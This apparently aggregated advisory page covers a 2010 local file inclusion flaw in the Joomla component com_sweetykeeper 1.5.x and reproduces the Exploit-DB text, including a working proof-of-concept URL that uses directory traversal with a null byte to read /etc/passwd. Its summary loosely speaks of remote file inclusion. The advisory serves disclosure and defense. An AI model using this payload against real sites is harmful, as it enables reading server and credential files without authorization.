Joomla Component Sweetykeeper Local File Inclusion Vulnerability

vendor:

com_sweetykeeper

by:

AntiSecurity

7,5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: com_sweetykeeper

Affected Version From: 1.5.x

Affected Version To: 1.5.x

Patch Exists: No

Related CWE: N/A

CPE: a:joomlacorner:com_sweetykeeper

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Joomla Component Sweetykeeper Local File Inclusion Vulnerability

A local file inclusion vulnerability exists in Joomla Component Sweetykeeper version 1.5.x. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to include a file from a remote server that contains malicious code, resulting in a malicious code execution on the vulnerable server.

Mitigation:

Ensure that user input is validated and filtered before being used in file operations. Also, ensure that the web server is configured to deny access to files outside of the web root directory.

Source

Exploit-DB raw data:

==================================================================================================================


  [o] Joomla Component Sweetykeeper Local File Inclusion Vulnerability
 
       Software : com_sweetykeeper version 1.5.x
       Vendor   : http://www.joomlacorner.com/
       Download : http://joomlacode.org/gf/project/thai/frs/?action=FrsReleaseView&release_id=9191
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/


==================================================================================================================


  [o] Exploit

       http://localhost/[path]/index.php?option=com_sweetykeeper&controller=[LFI]


  [o] PoC

       http://localhost/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00


==================================================================================================================


  [o] Greetz

       Angela Zhang stardustmemory aJe martfella pizzyroot Genex
       H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11


==================================================================================================================


  [o] April 12 2010 - GMT +07:00 Jakarta, Indonesia